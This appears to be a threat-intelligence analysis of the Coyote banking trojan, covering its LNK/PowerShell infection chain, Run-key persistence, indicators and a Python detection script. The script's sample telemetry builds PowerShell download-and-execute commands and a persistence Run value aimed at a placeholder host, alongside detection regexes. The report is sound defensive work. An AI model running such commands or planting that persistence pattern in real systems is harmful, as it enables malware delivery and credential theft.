Full Report
Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote. "Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week. The
Analysis Summary
# Tool/Technique: Coyote Banking Trojan
## Overview
Coyote is a banking malware primarily targeting Windows users in Brazil. Its latest campaign has expanded its reach to 1,030 sites and 73 financial institutions. The malware's primary functions are geared towards credential theft and system infiltration for financial fraud.
## Technical Details
- Type: Malware family (Banking Trojan)
- Platform: Windows
- Capabilities: Keylogging, screenshot capture, displaying phishing overlays, credential harvesting from financial applications, persistence establishment, remote payload retrieval.
- First Seen: Early 2024 (documented by Kaspersky)
## MITRE ATT&CK Mapping
*Note: The source text does not list ATT&CK IDs; the mappings below are inferred from the described capabilities.*
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File (the .LNK lure opened by the victim)
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- **TA0005 - Defense Evasion**
- T1027.010 - Obfuscated Files or Information: Command Obfuscation (Base64-encoded PowerShell)
- T1055 - Process Injection (Donut-generated shellcode injected to run the MSIL payload)
- **TA0006 - Credential Access**
- T1056.001 - Input Capture: Keylogging
- T1056.002 - Input Capture: GUI Input Capture (phishing overlays on banking applications)
- **TA0009 - Collection**
- T1113 - Screen Capture
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (next-stage download from the remote server)
## Functionality
### Core Capabilities
- **Credential Theft:** Captures sensitive credentials through keylogging and phishing overlays directed at users of financial applications.
- **Information Gathering:** Executes screenshot capture functionality.
- **Initial Access/Delivery (Latest Chain):** Delivered via malicious Windows Shortcut (.LNK) files that execute encoded PowerShell commands.
### Advanced Features
- **Staged Execution:** Utilizes a multi-stage infection process involving LNK files, PowerShell scripts, a remote server retrieval step, and an interim payload.
- **Loader Usage:** Employs a loader to execute an interim payload.
- **Payload Decryption:** Injects shellcode generated with the **Donut** loader, which decrypts and executes the final MSIL (.NET) payload in memory without writing it to disk.
- **Persistence Mechanism:** Adds a randomly named value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` whose data is a PowerShell command; on logon that command decodes a Base64-encoded URL, downloads the main stage from it and executes it.
- **Previous Chain (2024):** Began with Squirrel installer executables that launched a Node.js application compiled with Electron, which in turn ran a Nim-based loader.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: [Not provided in the text; the chain begins with .LNK files]
- Registry Keys: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (new randomly named value added for persistence)
- Network Indicators: `tbet.geontrigame[.]com` (Source for next-stage retrieval)
- Behavioral Indicators: Execution chain starting from LNK files, use of PowerShell to download remote stages, modification of Run registry key, execution of MSIL payloads after Donut decryption.
## Associated Threat Actors
- No specific group is named in the text; the campaign is attributed only to the Coyote operators, as documented by Fortinet FortiGuard Labs and, earlier, by Kaspersky.
## Detection Methods
- **Signature-based detection:** Signatures for the final Coyote payload and its loader; no file hashes are given in the text.
- **Behavioral detection:** Monitoring for powershell.exe spawned by explorer.exe (how a double-clicked shortcut runs its target) with `-EncodedCommand` or download cmdlets on the command line, for PowerShell that fetches remote content, and for new values under Run keys whose data invokes PowerShell or contains a Base64 literal.
- **YARA rules if available:** [Not provided in the text]
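The behavioral indicators above (shortcut-launched PowerShell with an encoded downloader, and a Run-key value that re-runs a PowerShell command carrying a Base64-encoded URL) can be checked directly against endpoint telemetry. The following is an added example, not code from the Fortinet or Kaspersky reports: it runs two heuristics over events shaped like Sysmon Event ID 1 (ProcessCreate) and 13 (RegistryEvent SetValue), reduced to dicts. The Sysmon field names are real; the sample records, the SID, the paths, the value name `qzv7k2` and the URLs under `example.invalid` are constructed placeholders, not indicators from the campaign.

```python
"""Heuristic detection for the LNK -> encoded PowerShell -> HKCU Run chain.

Added example (not from the original reports). Events are constructed in the
shape of Sysmon Event ID 1 and 13 records reduced to dicts; field names follow
Sysmon, the values are invented placeholders.
"""
import base64
import re

# Cmdlets / .NET members PowerShell uses to fetch remote content.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|downloaddata|net\.webclient|start-bitstransfer", re.I)
# -EncodedCommand and the abbreviations powershell.exe accepts (-e, -ec, -enc, ...).
# The length floor keeps "-ExecutionPolicy Bypass" from matching.
ENCODED_RE = re.compile(r"(?<!\S)-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)
# Any hive prefix: Sysmon logs HKU\<SID>\..., tools print HKCU\... or HKLM\...
RUN_KEY_RE = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\run\\[^\\]+$", re.I)
# Single-quoted Base64 literal, as passed to [Convert]::FromBase64String('...').
B64_LITERAL_RE = re.compile(r"'([A-Za-z0-9+/]{8,}={0,2})'")


def decode_encoded_command(text):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE), or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_embedded_urls(text):
    """Decode quoted Base64 literals and return those that turn out to be URLs."""
    urls = []
    for lit in B64_LITERAL_RE.findall(text):
        try:
            s = base64.b64decode(lit, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if s.lower().startswith(("http://", "https://")):
            urls.append(s)
    return urls


def analyze_process(ev):
    """Findings for a ProcessCreate event; empty list if it looks benign."""
    findings = []
    if not ev.get("Image", "").lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return findings
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded_command")
    if DOWNLOAD_RE.search(cmd + " " + (decoded or "")):
        findings.append("remote_download")
    # A double-clicked .lnk runs its target directly under explorer.exe, so the
    # shortcut path never appears on the command line; the parent is the clue.
    if findings and ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        findings.append("spawned_by_explorer")
    return findings


def analyze_registry(ev):
    """Findings for a RegistryEvent SetValue on a Run key; empty list otherwise."""
    findings = []
    details = ev.get("Details", "")
    if not RUN_KEY_RE.search(ev.get("TargetObject", "")):
        return findings
    if not re.search(r"powershell|pwsh", details, re.I):
        return findings
    findings.append("run_key_powershell")
    blob = details + " " + (decode_encoded_command(details) or "")
    if DOWNLOAD_RE.search(blob):
        findings.append("remote_download")
    for url in decode_embedded_urls(blob):
        findings.append("base64_url:" + url)
    return findings


def scan(events):
    """Run both analyzers and return only the events that produced findings."""
    out = []
    for ev in events:
        if ev.get("EventID") == 1:
            f = analyze_process(ev)
        elif ev.get("EventID") == 13:
            f = analyze_registry(ev)
        else:
            f = []
        if f:
            out.append({"EventID": ev["EventID"], "findings": f})
    return out


def ps_encode(script):
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry (placeholders, not real indicators).
STAGE_URL = "http://example.invalid/s2"
B64_URL = base64.b64encode(STAGE_URL.encode()).decode()
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -nop -enc "
                    + ps_encode("iex (iwr http://example.invalid/s1).Content")},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\qzv7k2",
     "Details": "powershell -w hidden -c \"iex (iwr ([Text.Encoding]::UTF8.GetString("
                f"[Convert]::FromBase64String('{B64_URL}'))))\""},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Running it flags the first two records (the explorer-spawned encoded downloader and the Run value hiding a URL in a Base64 literal) and leaves the scheduled inventory script and the OneDrive autostart alone. Decoding the `-EncodedCommand` argument before matching matters: the download cmdlet is invisible in the raw command line, and a rule that only looks for `-enc` would also fire on legitimate encoded scripts.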
## Mitigation Strategies
- **Prevention measures:** Block or quarantine .LNK files arriving by mail or download from untrusted sources; constrain PowerShell with Constrained Language Mode, script block logging and AMSI rather than relying on execution policy, which is not a security boundary and can be bypassed by the invoking command line.
- **Hardening recommendations:** Application control (WDAC or AppLocker) that blocks unsigned .NET (MSIL) assemblies and scripts outside approved paths; the same policy covers the older Squirrel/Electron/Nim chain should it reappear. Strong email and endpoint filtering.
## Related Tools/Techniques
- **Donut:** Open-source shellcode generator and in-memory loader; the malware uses it to decrypt and execute its MSIL (.NET) payload.
- Previous infection chain involved Squirrel installer, Node.js (Electron), and Nim-based loader.